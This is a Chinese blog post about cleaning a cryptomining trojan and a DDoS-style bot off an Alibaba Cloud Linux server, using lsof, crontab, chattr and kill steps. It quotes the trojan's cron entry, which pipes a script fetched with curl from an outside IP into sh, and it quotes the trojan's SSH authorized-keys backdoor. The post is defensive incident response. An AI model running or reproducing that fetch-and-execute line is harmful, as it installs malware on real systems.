今天我的阿里云服务器中招了

最新推荐文章于 2021-11-20 22:30:47 发布
最新推荐文章于 2021-11-20 22:30:47 发布
阅读量5.3k 收藏 4
点赞数 1
分类专栏: 闲聊 Linux 文章标签: Linux 木马 tplink gcc4-sh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhylg2001/article/details/53665516
版权

接到电话说阿里云上的服务无法访问,让我去处理下。最近这个阿里云服务器老是不稳定,动不动就无法访问,正好今天有时间,打算彻底检查下。

一检查,发现问题果然很严重,简单说,就是被人种了木马,而且还不止一个,晕倒了!

下面把中招以及处理的方法介绍一下,也算是一个经验教训吧。

木马1:挖矿木马minerd变种tplink

典型现象就是在系统CPU资源高达100%,但是用top看不到任何异常进程信息,只有用lsof 这个神器了

lsof -c tplink

结果一目了然

第一步是禁止tplink的自动启动,需要将所有相关的crontab都删除
检查/etc/crontab/var/spool/cron/root/var/spool/cron/crontabs/root 三个文件,将以下的自动执行命令删除(不同的变种命令可能会不同,但都是curl)

/10 * * * curl -fsSL http://101.55.126.66:8990/pm.sh | sh

第二步就是执行以下命令就可以把所有的tplink进程都杀了,同步把tplink文件给删除了

kill -9 3068 && rm -rf /usr/sbin/tplink

第三步去掉SSH信任,否则别人随时可以用root登录上来
修改/etc/ssh/sshd_config 文件的最后一行,把木马指向的信任文件

AuthorizedKeysFile .ssh/KHK75NEOiq

修改为正确的信任文件

AuthorizedKeysFile .ssh/authorized_keys

然后到/root/.ssh 目录下把木马的信任文件删除

rm -rf /root/.ssh/KHK75NEOiq

暂时这个木马就清除到这里。但事情还没有结束,这个变种还有一个更隐蔽的后手,接着来吧。

木马2:gcc4.sh
为什么叫gcc4.sh,因为我也不清楚这个木马应该叫什么,先命个名吧。

现象就是你到/var/log/cron 日志中查看,会发现以下内容

Dec 15 08:42:01 iZ CROND[1396]: (root) CMD (/etc/cron.hourly/gcc4.sh)

这次木马使用的cron脚本位置在/etc/crontab 

*/3 * * * * root /etc/cron.hourly/gcc4.sh

先删了干净。
然后发现这个木马会生成一个10个字母乱码的进程,例如ypyvjyodov等,和之前的挖矿木马不一样,它主要占用的是网络带宽,估计是用来进行DDoS攻击用的。

直接杀进程又会激发新的进程,而且名称一直在变,因此先禁止木马本体的访问权限

chattr +i /lib/libudev4.so

然后在删除木马服务的同时,禁止系统服务目录的写入权限

rm -rf /etc/init.d/kscqqdejrr && chattr +i /etc/init.d/

好了,这时候可以放心地杀进程了

pkill kscqqdejrr

杀了进程之后就是删除木马本体

chattr -i libudev4.so && rm -rf libudev4.so

清理服务目录/etc/rc.d,从rc0.drc6.d,一个一个来吧

全能的帅巨人
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
阿里云服务器
qq_48108860的博客
03-19 1904
阿里云 重置密码一定要记住 cmd ssh root@公网IP(39.104.24.238) apt-get update apt-get install apache2 apt-get install openjdk-8-jre-headless apt-get install mysql-server-8.0 mysql -uroot -proot(进入数据库) use mysql; update user set Host='%' where User.
阿里云服务器为什么总是那么不稳定经常崩溃掉线?
boke112的博客
05-08 5409
偶尔会看到有站长在抱怨说阿里云服务器不稳定,经常崩溃和掉线等现象,然后就说阿里云的各种不是等。客观上说阿里云在国内的市场占有率还是非常高的,建议大家要购买正规的阿里云服务器,成功购买之后建议专业的人做专业的事情,请高手帮忙优化服务器和站点,这样才会远离服务器不稳定和崩溃等情况(被攻击时除外)。 就好比同样配置的电脑,工作性质也类似,但是有些员工用着用着电脑就崩溃了卡顿了,但是有些员工用了好几年依然流畅没问题。同理,有些站长总是抱怨阿里云服务器不稳定会崩溃等,但是也有些站长用了好几年都未必会崩溃或重启一
记一则Linux病毒的处理
cleanfield的专栏
05-04 5257
源地址:http://www.kaisir.com/2015/07/ji-yi-ze-linux-bing-du-di-chu-li.html 今天某项目经理反馈学校的某台服务器不停的向外发包,且CPU持续100%,远程登录后查看发现有一长度为10的随机字符串进程,kill掉,会重新生成另外长度为10的字符串进程。删除文件也会重复生成,非常痛苦。查阅crond相关日志,发
Linux下随机10字符病毒的清除
lyy_yang的专栏
04-20 1314
(转)原博文地址http://blog.chinaunix.net/uid-20332519-id-4941140.html 如有侵权则联系本人删除,谢谢 。 病毒表现: 网络流量暴满,疯狂地向香港的一个IP发数据,同时在top里面表现为随机的10位字母的进程,看/proc里面的信息,则为ls,cd之类常见的命令,CPU利用率也在top之首。杀死该进程后,会再随机产生一个新的进程。
记一次阿里云服务器中挖矿病毒处理
kk.xie的博客
09-11 7586
1.收到阿里云发来的预警短信 【阿里云】尊敬的1*********9:云盾云安全中心检测到您的服务器:1xx.xx.xx.x5(gateway)出现了紧急安全事件:主动连接恶意下载源,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1.gYVW7 进行处理 。云安全中心提供企业版7天免费试用,您可以开通试用查看更多信息。如果您在处理过程中遇到问题,可...
阿里云服务器崩溃恢复解决办法
现实分享-李现鲥的博客
08-01 1万+
阿里云服务器崩溃恢复解决办法   上两天,服务器崩溃了,经过几个小时的抢救,终于恢复了。相信大家也或多或少,遇到过服务器崩溃,进不去的问题。今天我就在这儿分享一下我处理的办法。 先说一下,我的服务器是阿里云服务器,系统是linux。不管服务器是真的崩溃还是,只是进不去,还是其他问题,只要你想可以都可以按下面的步骤操作。 最重要的一步,也是后面的基本保障问题,备份数据。阿里云提供的快照备...
阿里云服务器中招挖矿病毒XMrig miner解决方法
Starbme_2018的博客
03-18 1万+
今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu进程占用高达80%以上,cpu总占用达到99%,查了下时间是昨天十点开始进程占用率奇高的,因此我知道头痛的事情又来了:挖矿病毒又回来了。。。 查了一下告警信息,如下: 该告警由如下引擎检测发现:...
阿里云服务器搭建redis-6.2.6集群
qq_47067442的博客
11-20 1069
由于资源有限,文章以搭建伪集群为例,即以单个服务不同的端口搭建redis集群,实现在公网可以直接访问 1.新建redis集群安装目录,并且在每个目录下新建data目录,用于保存redis数据 mkdir /usr/local/redis-cluster/redis-500{1,2,3} 2.从官网https://redis.io/download下载Redisredis-6.2.6 wget https://download.redis.io/releases/redis-6.2.6.tar.
如何利用阿里云服务器快照策略为数据备份
云计算技术分享
09-28 3028
阿里云服务器快照,是一个很好的备份容灾工具,不了解的可以先了解一下: 快照可以做什么? 这是一种便捷高效的数据保护服务手段,可以对重要业务数据进行备份,来应对误操作、攻击、病毒等导致的数据丢失风险。比如前段时间的勒索病毒事件,假设你中招后所有数据被加密,就不用担心,重置服务器后加载之前的快照就能恢复。此外,在操作系统更换,应用软件升级或业务数据迁移等重大操作前,快照是个保险。过程中有出现问题,...
LinuxCentOS7离线安装gcc
12-05
LinuxCentOS7版本离线安装gcc插件。1.下载gcc-rpm.tar.gz包,上传服务器并解压:#tar -zxvf gcc-rpm.tar.gz 2.进入gcc-rpm目录安装 #cd gcc-rpm #rpm -Uvh *.rpm --nodeps --force 3.查看是否是否安装成功 #gcc -v #g++ -v
备份容灾工具:阿里云服务器快照策略 为你的数据选个保险
j3rrry的博客
10-18 282
阿里云服务器快照,是一个很好的备份容灾工具,不了解的可以通过本文了解一下。 快照可以做什么? 这是一种便捷高效的数据保护服务手段,可以对重要业务数据进行备份,来应对误操作、攻击、病毒等导致的数据丢失风险。假设你中招后所有数据被加密,就不用担心,重置服务器后加载之前的快照就能恢复。此外,在操作系统更换,应用软件升级或业务数据迁移等重大操作前,快照是个保险。过程中有出现问题,可以通过数据快照恢复。 更多信息参阅快照备份文档 需要注意的地方: 1.从2017年3月28日开始,快照服务开始收费,但是收费不贵。 2.
阿里云服务器ssh经常一段时间就断掉解决办法
热门推荐
无效的博客
04-13 2万+
#vim /etc/ssh/sshd_config 找到下面两行 #ClientAliveInterval 0 #ClientAliveCountMax 3 去掉注释,改成 ClientAliveInterval 30 ClientAliveCountMax 86400 这两行的意思分别是 1、客户端每隔多少秒向服务发送一个心跳数据 2、客户端多少秒没有相应,服务器自动断
阿里云服务器中挖矿木马处理过程
小灵通的专栏
01-18 1万+
在阿里云租用一台服务器,最近发现被异地登陆,紧接着出现异常下载。登陆服务器,发现CPU达100%,并且安骑士提示有挖矿进程。因为对linux系统不是很熟悉,故而边找资料边处理实验,最后记录下来以便日后处理备查。首先登陆服务器,使用top命令查看进程:CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,首先比较直观的是imWBR1这个进程,查找它
使用阿里云云服务器一年多的感受
游戏人生的专栏
11-03 1万+
一年多之前,也就11年5月份的样子,阿里云云服务器产品线终于上线了。但那时候,国内完全没有能称得上云服务器的,很多小公司就是搞个VPS就叫云服务器了。以至于阿里云云服务器刚出来的时候,很多站长也是这么说的。那会儿我国外的虚拟主机也即将到期,而且国外访问速度确实要差不少。所以当时咬咬牙,狠下心来花了1999元买了一台(即现在的标准A,已经涨价了,呵呵,目前是3999元一年,当时有很多人很聪明,续费了
阿里云服务器操作
loveMaitekai的博客
02-04 3657
操作系统有三种: window ,linux,mac os 在企业里面服务器一般使用的都是liunx,因为linux性能比较好,但是linux在服务器上没有界面,通过黑窗口操作,用本地电脑链接linux服务器,通过ssh,链接,命令: ssh root@ip 点击回车 输入密码 进入服务器:linux 服务器系统有很多种,我们常用的乌班图 ,cenos,小红帽等,linux 系统结构: 首先通过 ...
解决:crontab里 stf: no such file or directory
慕禾⑦叶
10-04 3884
start.sh脚本如下: #! /bin/sh source $HOME/.zshrc YMD=""$( date ""+%Y.%m.%d"" )"" if [ "$1&quo
LINUX /var/spool/cron/root: Operation not permitted
80后大叔爱学习
07-19 1588
权限不够解释说明
黑科技揭秘:阿里云如何做到从业务宕机到恢复业务运行只用一分半钟时间
weixin_33860722的博客
09-22 337
2018杭州云栖大会主论坛上,阿里云打造的混合云容灾方案惊喜亮相,并直接在现场进行了全过程的演示,凸显出阿里云技术的强大心智。 整个混合云容灾演示在5分钟内呈现了阿里云秒级RPO,分钟级RTO企业应用容灾的端到端流程,涵盖了一个典型云容灾场景的核心步骤。 众所周知,企业关键业务宕机会带来非常大的损失,而传统的自建容灾方案成本高昂运维复杂,因此高性能的云容...
python中招素数
最新发布
09-23
素数是指只有1和它本身两个因数的正整数。要编写Python代码来找出素数,可以使用以下方法: ```python num = [] # 定义一个空列表用来接收找到的符合条件的数字 for i in range(2, 101): k = 0 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值